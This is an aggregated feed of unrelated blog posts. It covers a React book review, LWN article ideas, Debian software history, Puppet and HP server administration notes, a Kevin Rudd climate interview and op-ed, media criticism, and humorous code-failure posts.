The testing chapter was similarly disappointing in that it didn't answer any of my concrete questions about testing. My instinct with testing UIs is to break out Selenium and do integration testing with its backend, but the authors are huge fans of unit testing of React applications. Great, I thought, this should be interesting; unit testing seems like a poor fit for UI code because of how artificial the test construction is, but maybe I'm missing some subtlety. Convince me! And then the authors... didn't even attempt to convince me. They just asserted unit testing is great and explained how to write trivial unit tests that serve no useful purpose in a real application. End of chapter. Sigh.

I'm not sure what to say about this book. I feel like it has so many serious problems that I should warn everyone away from it, and yet the narrative introduction to React was truly fun to read and got me excited about writing React code. Even though the book largely fell apart as a reference, I still managed to write a working application using it as my primary reference, so it's not all bad. If you like the problem and solution style and want a highly conversational and informal tone (that errs on the side of weird breeziness), this may still be the book for you. Just be aware that the code examples are a trash fire, so if you learn from examples, you're going to have to chase them down via the GitHub repository and hope that they still exist (or get a later edition of the book where this problem has hopefully been corrected).

Rating: 6 out of 10

Planet DebianAntoine Beaupré: Lost article ideas

I wrote for LWN for about two years. During that time, I wrote (what seems to me an impressive) 34 articles, but I always had a pile of ideas in the back of my mind. Those are ideas, notes, and scribbles lying around. Some were just completely abandoned because they didn't seem a good fit for LWN.

Concretely, I stored those in branches in a git repository, and used the branch name (and, naively, the last commit log) as indicators of the topic.

This was the state of affairs when I left:

remotes/private/attic/novena                    822ca2bb add letter i sent to novena, never published
remotes/private/attic/secureboot                de09d82b quick review, add note and graph
remotes/private/attic/wireguard                 5c5340d1 wireguard review, tutorial and comparison with alternatives
remotes/private/backlog/dat                     914c5edf Merge branch 'master' into backlog/dat
remotes/private/backlog/packet                  9b2c6d1a ham radio packet innovations and primer
remotes/private/backlog/performance-tweaks      dcf02676 config notes for http2
remotes/private/backlog/serverless              9fce6484 postponed until kubecon europe
remotes/private/fin/cost-of-hosting             00d8e499 cost-of-hosting article online
remotes/private/fin/kubecon                     f4fd7df2 remove published or spun off articles
remotes/private/fin/kubecon-overview            21fae984 publish kubecon overview article
remotes/private/fin/kubecon2018                 1edc5ec8 add series
remotes/private/fin/netconf                     3f4b7ece publish the netconf articles
remotes/private/fin/netdev                      6ee66559 publish articles from netdev 2.2
remotes/private/fin/pgp-offline                 f841deed pgp offline branch ready for publication
remotes/private/fin/primes                      c7e5b912 publish the ROCA paper
remotes/private/fin/runtimes                    4bee1d70 prepare publication of runtimes articles
remotes/private/fin/token-benchmarks            5a363992 regenerate timestamp automatically
remotes/private/ideas/astropy                   95d53152 astropy or python in astronomy
remotes/private/ideas/avaneya                   20a6d149 crowdfunded blade-runner-themed GPLv3 simcity-like simulator
remotes/private/ideas/backups-benchmarks        fe2f1f13 review of backup software through performance and features
remotes/private/ideas/cumin                     7bed3945 review of the cumin automation tool from WM foundation
remotes/private/ideas/future-of-distros         d086ca0d modern packaging problems and complex apps
remotes/private/ideas/on-dying                  a92ad23f another dying thing
remotes/private/ideas/openpgp-discovery         8f2782f0 openpgp discovery mechanisms (WKD, etc), thanks to jonas meurer
remotes/private/ideas/password-bench            451602c0 bruteforce estimates for various password patterns compared with RSA key sizes
remotes/private/ideas/prometheus-openmetrics    2568dbd6 openmetrics standardizing prom metrics enpoints
remotes/private/ideas/telling-time              f3c24a53 another way of telling time
remotes/private/ideas/wallabako                 4f44c5da talk about wallabako, read-it-later + kobo hacking
remotes/private/stalled/bench-bench-bench       8cef0504 benchmarking http benchmarking tools
remotes/private/stalled/debian-survey-democracy 909bdc98 free software surveys and debian democracy, volunteer vs paid work

Wow, what a mess! Let's see if I can make sense of this:


Those are articles that I thought about, then finally rejected, either because it didn't seem worth it, or my editors rejected it, or I just moved on:

  • novena: the project is ooold now, didn't seem to fit a LWN article. it was basically "how can i build my novena now" and "you guys rock!" it seems like the MNT Reform is the brain child of the Novena now, and I dare say it's even cooler!
  • secureboot: my LWN editors were critical of my approach, and probably rightly so - it's a really complex subject and I was probably out of my depth... it's also out of date now, we did manage secureboot in Debian
  • wireguard: LWN ended up writing extensive coverage, and I was biased against Donenfeld because of conflicts in a previous project


Those were articles I was planning to write about next.

  • dat: I already had written Sharing and archiving data sets with Dat, but it seems I had more to say... mostly performance issues, beaker, no streaming, limited adoption... to be investigated, I guess?
  • packet: a primer on data communications over ham radio, and the cool new tech that has emerged in the free software world. those are mainly notes about Pat, Direwolf, APRS and so on... just never got around to making sense of it or really using the tech...
  • performance-tweaks: "optimizing websites at the age of http2", the unwritten story of the optimization of this website with HTTP/2 and friends
  • serverless: god. one of the leftover topics at Kubecon, my notes on this were thin, and the actual subject, possibly even thinner... the only lie worse than the cloud is that there's no server at all! concretely, that's a pile of notes about Kubecon which I wanted to sort through. Probably belongs in the attic now.


Those are finished articles, they were published on my website and LWN, but the branches were kept because previous drafts had private notes that should not be published.


A lot of those branches were actually just an empty commit, with the commitlog being the "pitch", more or less. I'd send that list to my editors, sometimes with a few more links (basically the above), and they would nudge me one way or the other.

Sometimes they would actively discourage me to write about something, and I would do it anyways, send them a draft, and they would patiently make me rewrite it until it was a decent article. This was especially hard with the terminal emulator series, which took forever to write and even got my editors upset when they realized I had never installed Fedora (I ended up installing it, and I was proven wrong!)


Oh, and then there's those: those are either "ideas" or "backlog" that got so far behind that I just moved them out of the way because I was tired of seeing them in my list.

  • stalled/bench-bench-bench benchmarking http benchmarking tools, a horrible mess of links, copy-paste from terminals, and ideas about benchmarking... some of this trickled out into this benchmarking guide at Tor, but not much more than the list of tools
  • stalled/debian-survey-democracy: "free software surveys and Debian democracy, volunteer vs paid work"... A long standing concern of mine is that all Debian work is supposed to be volunteer, and paying explicitly for work inside Debian has traditionally been frowned upon, even leading to serious drama and dissent (remember Dunc-Tank)? back when I was writing for LWN, I was also doing paid work for Debian LTS. I also learned that a lot (most?) Debian Developers were actually being paid by their job to work on Debian. So I was confused by this apparent contradiction, especially given how the LTS project has been mostly accepted, while Dunc-Tank was not... See also this talk at Debconf 16. I had hopes that this study would show the "hunch" people have offered (that most DDs are paid to work on Debian) but it seems to show the reverse (only 36% of DDs, and 18% of all respondents paid). So I am still confused and worried about the sustainability of Debian.

What do you think?

So that's all I got. As people might have noticed here, I have much less time to write these days, but if there's any subject in there I should pick, what is the one that you would find most interesting?

Oh! and I should mention that you can write to LWN! If you think people should know more about some Linux thing, you can get paid to write for it! Pitch it to the editors, they won't bite. The worst that can happen is that they say "yes" and there goes two years of your life learning to write. Because no, you don't know how to write, no one does. You need an editor to write.

That's why this article looks like crap and has a smiley. :)


Planet DebianGunnar Wolf: FLISOL • Talking about Jitsi

Every year since 2005 there is a very good, big and interesting Latin American gathering of free-software-minded people. Of course, Latin America is a big, big, big place, and it’s not like we are the most economically buoyant region to meet in something equiparable to FOSDEM.

What we have is a distributed free software conference — originally, a distributed Linux install-fest (which I never liked, I am against install-fests), but gradually it morphed into a proper conference: Festival Latinoamericano de Instalación de Software Libre (Latin American Free Software Installation Festival)

This FLISOL was hosted by the always great and always interesting Rancho Electrónico, our favorite local hacklab, and has many other interesting talks.

I like talking about projects where I am involved as a developer… but this time I decided to do otherwise: I presented a talk on the Jitsi videoconferencing server. Why? Because of the relevance videoconferences have had over the last year.

So, without further ado — Here is a video I recorded locally from the talk I gave (MKV), as well as the slides (PDF).

Sam VargheseAll the news (apart from the Middle East issue) that’s fit to print

The Saturday Paper — as its name implies — is a weekend newspaper published from Melbourne, Australia. Given this, it rarely has any real news, but some of the features are well-written.

There is a column called Gadfly (again the name would indicate what it is about) which is extremely well-written and is one of the articles that I read every week. It was written for some years by one Richard Ackland, a lawyer with very good writing skills, and is now penned by one Sami Shah, an Indian, who is, again a good writer. Gadfly is funny and, like most of the opinion content in the paper, is left-oriented.

The same cannot be said of some of the other writers. Karen Middleton and Rick Morton fall into the category of poor writers, though the latter sometimes does provide a story that has not been run anywhere else. Middleton can only be described as a hack.

Mike Seccombe is another of the good writers and, when he figures on the day’s menu, one can be assured that the content will be good. Another good writer, David Marr, has now gone missing; indeed, he is not writing for any newspaper at the moment.

But the one fault line that The Saturday Paper has is that it will never cover the Middle East. The owner, Morry Schwartz [seen below in an image used courtesy of Fairfax], leans towards supporting the right-wing Israeli leader Benjamin Netanyahu and thus no matter what atrocities are being perpetrated on the Palestinians, you can be assured that not even a word will not appear in this newspaper.

Critics of the paper avoid mentioning this, in keeping with the habit prevalent in the West, of never saying anything that could be construed as being critical of Israel.

This proclivity of Schwartz was noticed early on and mentioned by a couple of Australian writers. One, Tim Robertson, had this to say when the paper had just started out: “…the Saturday Paper’s coverage of Israel’s assault on Gaza has been conspicuously, well, non-existent. As the death toll rises and more atrocities are committed, the Saturday Paper’s pages remain, to date, devoid of any comment.”

Explaining this, John van Tiggelen, a former editor of The Monthly (another Schwartz publication) said: ” mean, it’s seen as a Left-wing publication, but the publisher is very Right-wing on Israel […] And he’s very much to the, you know, Benjamin Netanyahu end of politics. So, you can’t touch it; just don’t touch it. It’s a glass wall.”

Australian media are very touchy about Israel. One of the country’s better writers, Mike Carlton, lost a plum job with the former Fairfax Media — now absorbed into the publishing and broadcasting firm, Nine Entertainment — when he criticised Israel over one of its attacks on Gaza.

And some supporters of Israel in Melbourne are quite powerful. Fairfax had – and still has – a rather juvenile columnist named Julie Szego. When one of her columns was rejected by the then editor, Paul Ramadge (the staff used to say of him, “Ramadge rhymes with damage”), she ran to Fairfax board member Mark Leibler and requested him to intervene. Hey presto, the column was published.

Of course, it is the prerogative of an editor or owner to keep out what he/she does not want published. But is one is given to describing one’s publication as a newspaper and then ignores one of the world’s major issues, then one’s credibility does tend to suffer.

Planet DebianAntoine Beaupré: A dead game clock

Time flies. Back in 2008, I wrote a game clock. Since then, what was first called "chess clock" was renamed to pychessclock and then Gameclock (2008). It shipped with Debian 6 squeeze (2011), 7 wheezy (4.0, 2013, with a new UI), 8 jessie (5.0, 2015, with a code cleanup, translation, go timers), 9 stretch (2017), and 10 buster (2019), phew! Eight years in Debian over 4 releases, not bad!

But alas, Debian 11 bullseye (2021) won't ship with Gameclock because both Python 2 and GTK 2 were removed from Debian. I lack the time, interest, and energy to port this program. Even if I could find the time, everyone is on their phone nowadays.

So finding the right toolkit would require some serious thinking about how to make a portable program that can run on Linux and Android. I care less about Mac, iOS, and Windows, but, interestingly, it feels it wouldn't be much harder to cover those as well if I hit both Linux and Android (which is already hard enough, paradoxically).

(And before you ask, no, Java is not an option for me thanks. If I switch to anything else than Python, it would be Golang or Rust. And I did look at some toolkit options a few years ago, was excited by none.)

So there you have it: that is how software dies, I guess. Alternatives include:

  • Chessclock - really old Ruby which made Gameclock rename
  • Ghronos - also really old Java app
  • Lichess - has a chess clock built into the app
  • Otter - if you squint a little

PS: Monkeysign also suffered the same fate, for what that's worth. Alternatives include caff, GNOME Keysign, and pius. Note that this does not affect the larger Monkeysphere project, which will ship with Debian bullseye.

Planet DebianJoey Hess: here's your shot

The nurse releases my shoulder and drops the needle in a sharps bin, slaps on a smiley bandaid. "And we're done!" Her cheeryness seems genuine but a little strained. There was a long line. "You're all boosted, and here's your vaccine card."

Waiting out the 15 minutes in observation, I look at the card.

Moderna COVID-19/22 vaccine booster
3/21/2025              lot #5829126


(Tear at perforated line.)
- - - - - - - - - - - - - - - - - -

Here's your shot at

       and win

I bite my nails, when I'm not wearing this mask. So I scrub inneffectively at the grainy silver box. Not like the woman across from me, three kids in tow, who's zipping through her sheaf of scratchers.

The message on mine becomes clear: 1 month free Amazon Prime

Ah well.


Planet DebianThomas Goirand: Puppet and OS detection

As you may know, Puppet uses “facter” to get facts about the machine it is about to configure. That’s fine, and a nice concept. One can later use variables in a puppet manifest to do different things depending on what facter tells. For example, the operating system name … oh no! This thing is really stupid … Here’s the code one has to do to be compatible with puppet from version 3 up to 5:

if $::lsbdistcodename == undef{
# This works around differences between facter versions
if $facts['os']['lsb'] != undef{
$distro_codename = $facts['os']['lsb']['distcodename']
$distro_codename = $facts['os']['distro']['codename']
$distro_codename = downcase($::lsbdistcodename)

Indeed, the global variable $::lsbdistcodename still existed up to Stretch (and is gone in Buster). The global $::facts wasn’t an array before (but a hash), so in Jessie, it breaks with the error message “facts is not a hash or array when accessing it with os”. So, one need the full code above to make this work.

It’s ok to improve things. It is NOT OK to break os detection. To me it is a very bad practice from upstream Puppet authors. I’m publishing this in the hope to avoid others to fall in the same trap as I did.

Planet DebianMatthew Garrett: An accidental bootsplash

Back in 2005 we had Debconf in Helsinki. Earlier in the year I'd ended up invited to Canonical's Ubuntu Down Under event in Sydney, and one of the things we'd tried to design was a reasonable graphical boot environment that could also display status messages. The design constraints were awkward - we wanted it to be entirely in userland (so we didn't need to carry kernel patches), and we didn't want to rely on vesafb[1] (because at the time we needed to reinitialise graphics hardware from userland on suspend/resume[2], and vesa was not super compatible with that). Nothing currently met our requirements, but by the time we'd got to Helsinki there was a general understanding that Paul Sladen was going to implement this.

The Helsinki Debconf ended being an extremely strange event, involving me having to explain to Mark Shuttleworth what the physics of a bomb exploding on a bus were, many people being traumatised by the whole sauna situation, and the whole unfortunate water balloon incident, but it also involved Sladen spending a bunch of time trying to produce an SVG of a London bus as a D-Bus logo and not really writing our hypothetical userland bootsplash program, so on the last night, fueled by Koff that we'd bought by just collecting all the discarded empty bottles and returning them for the deposits, I started writing one.

I knew that Debian was already using graphics mode for installation despite having a textual installer, because they needed to deal with more complex fonts than VGA could manage. Digging into the code, I found that it used BOGL - a graphics library that made use of the VGA framebuffer to draw things. VGA had a pre-allocated memory range for the framebuffer[3], which meant the firmware probably wouldn't map anything else there any hitting those addresses probably wouldn't break anything. This seemed safe.

A few hours later, I had some code that could use BOGL to print status messages to the screen of a machine booted with vga16fb. I woke up some time later, somehow found myself in an airport, and while sitting at the departure gate[4] I spent a while staring at VGA documentation and worked out which magical calls I needed to make to have it behave roughly like a linear framebuffer. Shortly before I got on my flight back to the UK, I had something that could also draw a graphical picture.

Usplash shipped shortly afterwards. We hit various issues - vga16fb produced a 640x480 mode, and some laptops were not inclined to do that without a BIOS call first. 640x400 worked basically everywhere, but meant we had to redraw the art because circles don't work the same way if you change the resolution. My brief "UBUNTU BETA" artwork that was me literally writing "UBUNTU BETA" on an HP TC1100 shortly after I'd got the Wacom screen working did not go down well, and thankfully we had better artwork before release.

But 16 colours is somewhat limiting. SVGALib offered a way to get more colours and better resolution in userland, retaining our prerequisites. Unfortunately it relied on VM86, which doesn't exist in 64-bit mode on Intel systems. I ended up hacking the x86emu into a thunk library that exposed the same API as LRMI, so we could run it without needing VM86. Shockingly, it worked - we had support for 256 colour bootsplashes in any supported resolution on 64 bit systems as well as 32 bit ones.

But by now it was obvious that the future was having the kernel manage graphics support, both in terms of native programming and in supporting suspend/resume. Plymouth is much more fully featured than Usplash ever was, but relies on functionality that simply didn't exist when we started this adventure. There's certainly an argument that we'd have been better off making reasonable kernel modesetting support happen faster, but at this point I had literally no idea how to write decent kernel code and everyone should be happy I kept this to userland.

Anyway. The moral of all of this is that sometimes history works out such that you write some software that a huge number of people run without any idea of who you are, and also that this can happen without you having any fucking idea what you're doing.

Write code. Do crimes.

[1] vesafb relied on either the bootloader or the early stage kernel performing a VBE call to set a mode, and then just drawing directly into that framebuffer. When we were doing GPU reinitialisation in userland we couldn't guarantee that we'd run before the kernel tried to draw stuff into that framebuffer, and there was a risk that that was mapped to something dangerous if the GPU hadn't been reprogrammed into the same state. It turns out that having GPU modesetting in the kernel is a Good Thing.

[2] ACPI didn't guarantee that the firmware would reinitialise the graphics hardware, and as a result most machines didn't. At this point Linux didn't have native support for initialising most graphics hardware, so we fell back to doing it from userland. VBEtool was a terrible hack I wrote to try to re-execute the system's graphics hardware through a range of mechanisms, and it worked in a surprising number of cases.

[3] As long as you were willing to deal with 640x480 in 16 colours

[4] Helsinki-Vantaan had astonishingly comfortable seating for time

comment count unavailable comments

Kevin RuddABC NewsRadio: Earth Day Summit

23 APRIL 2021

Topics: US climate summit; Murdoch Royal Commission

Thomas Oriti
Leaders of more than 40 countries have held a global summit overnight on the world’s response to climate change. They spoke of the urgent need to save the planet from global warming and talked of a jobs boom in the coming years from clean energy technologies. It was hosted by the US President Joe Biden. The US made a commitment to reduce carbon emissions by 50% by the year 2030. The UK says it will cut emissions by 75% by 2035. But let’s look at the Australian perspective. Before the summit began, Australia announced it would not be changing its commitment to a 26-28% reduction by the turn of the next decade. Now Kevin Rudd is a former Australian Prime Minister and president of the Asia Society in New York who joins us live now. Mr Rudd, good morning.

Kevin Rudd
Good morning.

Thomas Oriti
Thank you for your time. You have attended similar high-level climate summits in the past. What kind of standing does Australia have with no new commitments overnight?

Kevin Rudd
A deeply diminished standing is the honest response to that, and that’s a reflection of the views of governments around the Western world and frankly in the emerging world as well. Australia can and should do more. And it’s not simply a question of political atmospherics here; there’s basic science involved in this. If we could keep temperature increases globally, on average, around 1.5 degrees centigrade increased by the end of this century then what it means is we have to move to carbon neutrality by mid-century. To get to carbon neutrality by mid-century, we’ve got to radically reduce our carbon emissions before 2030 with new targets. Other countries have done that. Australia is not.

Thomas Oriti
But Scott Morrison would argue that he is doing something. I mean, over the last two days, we’ve seen a combined $1 billion investment in clean technology. And he said to the summit that his government’s focus is a technology-driven approach to mitigating emissions, saying reaching net-zero he is based on the how and not the when. I mean, what do you make of that sort of approach, focusing on technology?

Kevin Rudd
Well that’s Mr Morrison catering to his own domestic political constituency rather than act of appropriate international leadership by the Prime Minister of Australia at a major global summit to bring about real carbon reductions. The bottom line is the planet doesn’t wait for Mr Morrison to say ‘well, hydrogen will come on stream in X year and and coal reduction targets will come on-stream in Y year’. The reason why the international community, led by the United States in what has been remarkably successful summit minus Australia, is talking about mid-century carbon neutrality, new nationally determined contributions between now and 2030, is to make the mathematics and the science stack up to keep temperature increases within 1.5 degrees. What we’ve heard from Mr Morrison instead is frankly just a bunch of politically driven posturing which doesn’t add up and I think in the international community is treated with contempt, which is why he was heard make his contribution so far down the batting order.

Thomas Oriti
OK well we look at the international community. American officials are reportedly dissatisfied with Australia’s approach. The Biden administration has said it will try to pressure other countries to do more. I mean, how much of an impact do you think that could have on the Morison government?

Kevin Rudd
Well so far, if Morrison was to work out that the United States as our principal ally, who we need in multiple areas of our international policy interest, is making this demand clear of the Australian Government, he really does need to begin to adjust now – in fact, if not yesterday. But if that persuasion doesn’t work, there’s something else rolling down the railway tracks towards Australia, which is so-called border adjustment tariffs, now being actively debated, deliberated on and decided both in Brussels and considered also in Washington to effectively impose a tax on those countries which refuse to take their share of the global burden in bringing down carbon emissions. So if it’s not going to be, as it were, inducement from the US through our alliance relationship with Washington, then there is the threat of punitive financial action which would affect the entire Australian economy. But you know something? Australia as a responsible middle power in the world, and as the driest continent on Earth, for God’s sake, we should be acting as the global leaders here, not the global wooden-spooners.

Thomas Oriti
You wrote an opinion piece in The Guardian this week, Mr Rudd with another former prime minister, Malcolm Turnbull, and how Australia’s ambition on climate change is held back by what you’re saying is a toxic mix of right-wing politics, media, and vested interests. I want to pick up on that last bit. Who are these vested interests and what’s their role?

Kevin Rudd
Well this has become a matter of political raw red meat for the Liberal Party and the National Party to go and chant the coal mantra. That’s one element of it, it’s part of the internal dynamics of the Liberal and National parties. Secondly, I didn’t say the media, I said the Murdoch media, and the Murdoch media has run — and Malcolm Turnbull agrees with — me a vicious campaign against effective climate change action in this country for more than a decade now. And because of their power in the print media in this country, where they have 70% of the print ownership, they have shaped and influenced significantly the terms of our national debate. And the third element in all this, of course, they’re our own big hydrocarbon companies, led by companies like BHP, which have been dragging the chain on this for a very long time. Put those three together, and they can’t hydrocarbon lobby’s trade union, which is the Minerals Council of Australia, this represents a very powerful potent force in Australian politics, which I’ve had to contend with as prime minister and they ultimately prevailed against me; which Malcolm Turnbull had to work against when he was Prime Minister, they prevailed against him; frankly, what is being lost as a consequence of this is effective, clear Australian international leadership on something which matters for our environment, and economy for the future.

Thomas Oriti
Just pick up on something you said a moment ago about the Murdoch media, Mr Rudd, the former US Director of National Intelligence, James Clapper, has backed to your call for a royal commission into Rupert Murdoch’s media empire here in Australia. What do you may give that support and where are you at with your petition at the moment?

Kevin Rudd
Well, the result of our petition which attracted more than half a million signatures within 28 days across Australia — because the system collapsed, we suspect hundreds of thousands of petitioners in addition to that — the Senate decided to commission its own investigation into the future of media diversity. It continues to take evidence from myself, Malcolm Turnbull and others, including the media proprietors, on what we do on the future of this extraordinary monopoly which the Murdoch media has in Australia. It is the highest concentration of print media ownership anywhere in the Western world. Now, when Jim Clapper intervenes as the former director of national intelligence in the United States, what Clapper is saying is the impact of Murdoch there in America, where he is not a majority player, but he’s an aggressive player through Fox News, is that untrammelled this Fox media beast has significantly derailed the potentially for consensus in American politics, not just on climate change, but across a whole range of pressing challenges facing the United States. So he’s sending a clarion clear message, that if we’re going to have Fox News exercise that sort of influence in Australia, through Sky News, which is now having a huge impact across social media platforms and YouTube, then our country prospectively becomes ungovernable like the United States has become in large part in recent years.

Thomas Oriti
Kevin Rudd, thanks very much for joining us this morning.

Kevin Rudd
Good to be with you.

Thomas Oriti
Former Australian Prime Minister Kevin Rudd, who is the president of the Asia Society in New York.

The post ABC NewsRadio: Earth Day Summit appeared first on Kevin Rudd.

Worse Than FailureError'd: When Words Collide

Waiting for his wave to collapse, surfer Mike I. harmonizes "Nice try Power BI, but you're not doing quantum computing quite right." Or, does he?



Finn Antti, caught in a hella Catch-22, explains " Apparently I need to install Feedback Hub from Microsoft Store to tell Microsoft that I can't install Feedback Hub from Microsoft Store."



Our old friend Pascal shares "Coupon codes don't work very well when they are URL encoded."



Uninamed pydsigner has a strong meme game. "It's bad enough when your fairly popular meme creation site runs out of storage, but to be unable to serve your pictures as a result? The completely un-obfuscated stacktrace is just insult to the injury. "



But the submission from Brad W. wins this week's prize . Says he: "The vehicle emissions site (linked directly from the state site) isn't handling the increased traffic well, but their error handling is superb. An online code browser allowing for complete examination of the entire stack and surroundings."



[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!


Planet DebianDirk Eddelbuettel: drat 0.2.0: Now with ‘docs/’

drat user

A new release of drat arrived on CRAN today. This is the first release in a few months (with the last release in July of last year) and it (finally) makes the leap to supporting docs/ in the main branch as we are all so tired of the gh-pages branch. We also have new vignettes, new (and very shiny) documentation and refreshed vignettes!

drat stands for drat R Archive Template, and helps with easy-to-create and easy-to-use repositories for R packages. Since its inception in early 2015 it has found reasonably widespread adoption among R users because repositories with marked releases is the better way to distribute code. See below for a few custom reference examples.

Because for once it really is as your mother told you: Friends don’t let friends install random git commit snapshots. Or as we may now add: stay away from semi-random universes snapshots too.

Properly rolled-up releases it is. Just how CRAN shows us: a model that has demonstrated for two-plus decades how to do this. And you can too: drat is easy to use, documented by (now) six vignettes and just works.

The NEWS file summarises the release as follows:

Changes in drat version 0.2.0 (2021-04-21)

  • A documentation website for the package was added at (Dirk)

  • The continuous integration was switched to using ‘r-ci’ (Dirk)

  • The docs/ directory of the main repository branch can now be used instead of gh-pages branch (Dirk in #112)

  • A new repository can now be used to fork an initial drat repository (Dirk)

  • A new vignette “Drat Step-by-Step” was added (Roman Hornung and Dirk in #117 fixing #115 and #113)

  • The test suite was refactored for docs/ use (Felix Ernst in #118)

  • The minimum R version is now ‘R (>= 3.6)’ (Dirk fixing #119)

  • The vignettes were switched to minidown (Dirk fixing #116)

  • A new test file was added to ensure ‘NEWS.Rd’ is always at the current release version.

Courtesy of my CRANberries, there is a comparison to the previous release. More detailed information is on the drat page.

If you like this or other open-source work I do, you can now sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Kevin RuddAFR: Mining Super-Profits Levy

The University of Western Australia

21 APRIL 2021

Published in the Australian Financial Review on 22 April 2021

“As was the case during the last resources boom, and the one before that, the super-profits earned by a handful of resource majors in this country are a giant rip-off of the Australian people.

“Furthermore, the greed of these three is unbelievable: they haven’t even bothered to establish serious, large scale charitable foundations to benefit the Australian people at the scale that other serious global firms do. And in Rio’s case, they dynamite indigenous heritage in the way through.

“I fully understand the financial investment needed for long term projects. But nowhere in their long term financial planning did any company forecast prices at this level. That’s why the Australian people, who actually own these resources and merely lease them to these companies, deserve a higher return.

“That’s why I believe these three majors should pay a super-profits levy into a national investment fund to underpin the future of Australian higher education and research, because this is the sector that will need to generate the next tranche of national wealth. We need Australian equity in the global technology revolution now underway, where we are in danger of owning none of the intellectual property and assets that will drive future global growth.”


The post AFR: Mining Super-Profits Levy appeared first on Kevin Rudd.

Planet DebianRussell Coker: HP MP350P Gen8

I’m playing with a HP Proliant ML350P Gen8 server (part num 646676-011). For HP servers “ML” means tower (see the ProLiant Wikipedia page for more details [1]). For HP servers the “generation” indicates how old the server is, Gen8 was announced in 2012 and Gen10 seems to be the current generation.

Debian Packages from HP

wget -O /usr/local/
echo "# HP RAID" >> /etc/apt/sources.list
echo "deb [signed-by=/usr/local/] buster/current non-free" >> /etc/apt/sources.list

The above commands will setup the APT repository for Debian/Buster. See the HP Downloads FAQ [2] for more information about their repositories.


This package contains the hponcfg program that configures ILO (the HP remote management system) from Linux. One noteworthy command is “hponcfg -r” to reset the ILO, something you should do before selling an old system.


This package contains the ssacli program to configure storage arrays, here are some examples of how to use it:

# list controllers and show slot numbers
ssacli controller all show
# list arrays on controller identified by slot and give array IDs
ssacli controller slot=0 array all show
# show details of one array
ssacli controller slot=0 array A show
# show all disks on one controller
ssacli controller slot=0 physicaldrive all show
# show config of a controller, this gives RAID level etc
ssacli controller slot=0 show config
# delete array B (you can immediately pull the disks from it)
ssacli controller slot=0 array B delete
# create an array type RAID0 with specified drives, do this with one drive per array for BTRFS/ZFS
ssacli controller slot=0 create type=arrayr0 drives=1I:1:1

When a disk is used in JBOD mode just under 33MB will be used at the end of the disk for the RAID metadata. If you have existing disks with a DOS partition table you can put it in a HP array as a JBOD and it will work with all data intact (GPT partition table is more complicated). When all disks are removed from the server the cooling fans run at high speed, this would be annoying if you wanted to have a diskless workstation or server using only external storage.


This package contains the ssaducli diagnostic utility for storage arrays. The SSD “wear gauge report” doesn’t work for the 2 SSDs I tested it on, maybe it only supports SAS SSDs not SATA SSDs. It doesn’t seem to do anything that I need.


This package contains both 32bit and 64bit versions of the MegaRAID utility and deletes whichever one doesn’t match the installation in the package postinst, so it fails debsums checks etc. The MegaRAID utility is for a different type of RAID controller to the “Smart Storage Array” (AKA SSA) that the other utilities work with. As an aside it seems that there are multiple types of MegaRAID controller, the management program from the storcli package doesn’t work on a Dell server with MegaRAID. They should have made separate 32bit and 64bit versions of this package.


Here is HP page for downloading firmware updates (including security updates) [3], you have to login first and have a warranty. This is legal but poor service. Dell servers have comparable prices (on the second hand marker) and comparable features but give free firmware updates to everyone. Dell have overall lower quality of Debian packages for supporting utilities, but a wider range of support so generally Dell support seems better in every way. Dell and HP hardware seems of equal quality so overall I think it’s best to buy Dell.

Suggestions for HP

Finding which of the signing keys to use is unreasonably difficult. You should get some HP employees to sign the HP keys used for repositories with their personal keys and then go to LUG meetings and get their personal keys well connected to the web of trust. Then upload the HP keys to the public key repositories. You should also use the same keys for signing all versions of the repositories. Having different keys for the different versions of Debian wastes people’s time.

Please provide firmware for all users, even if they buy systems second hand. It is in your best interests to have systems used long-term and have them run securely. It is not in your best interests to have older HP servers perform badly.

Having all the fans run at maximum speed when power is turned on is a standard server feature. Some servers can throttle the fan when the BIOS is running, it would be nice if HP servers did that. Having ridiculously loud fans until just before GRUB starts is annoying.

Worse Than FailureCodeSOD: Saved Changes

When you look at bad code, there's a part of your body that reacts to it. You can just feel it, in your spleen. This is code you don't want to maintain. This is code you don't want to see in your code base.

Sometimes, you get that reaction to code, and then you think about the code, and say: "Well, it's not that bad," but your spleen still throbs, because you know if you had to maintain this code, it'd be constant, low-level pain. Maybe you ignore your spleen, because hey, a quick glance, it doesn't seem that bad.

But your spleen knows. A line that seems bad, but mostly harmless, can suddenly unfurl into something far, far nastier.

This example, from Rikki, demonstrates:

private async void AttemptContextChange(bool saveChanges = true) { if (m_Context != null) { if (saveChanges && !SaveChanges()) { // error was already displayed to the user, just stop } else { dataGrid.ItemSource = null; m_Context.Dispose(); } } }

if (saveChanges && !SaveChanges()) is one of those lines that crawls into your spleen and just sits there. My brain tried to say, "oh, this is fine, SaveChanges() probably is just a validation method, and that's why the UI is already up to date, it's just a bad name, it should be CanSaveChanges()" . But if that's true, where does it perform the actual save? Nowhere here. My brain didn't want to see it, but my spleen knew.

If you ignore your spleen and spend a second thinking, it more or less makes sense: saveChanges (the parameter) is a piece of information about this operation- the user would like to save their changes. SaveChanges() the method probably attempts to save the changes, and returns a boolean value if it succeeded.

But wait, returning boolean values isn't how we communicate errors in a language like C#. We can throw exceptions! SaveChanges() should throw an exception if it can't proceed.

Which, speaking of exceptions, we need to think a little bit about the comment: // error was already displayed to the user, just stop.

This comment contains a lot of information about the structure of this program. SaveChanges() attempts to do the save, it catches any exceptions, and then does the UI updates, completely within its own flow. That simple method call conceals a huge amount of spaghetti code.

Sometimes, code doesn't look terrible to your brain, but when you feel its badness in your spleen, listen to it. Spleen-oriented Programming is where you make sure none of the code you have to touch makes your spleen hurt.

[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!

Planet DebianShirish Agarwal: The Great Train Robbery

I had a twitter fight few days back with a gentleman and the article is a result of that fight. Sadly, I do not know the name of the gentleman as he goes via a psuedo name and then again I’ve not taken permission from him to quote him in either way. So I will just state the observations I was able to make from the conversations we had. As people who read this blog regularly would know, I am and have been against Railway Privatization which is happening in India. And will be sharing some of the case studies from other countries as to how it panned out for them.

UK Railways

How Privatization Fails : Railways

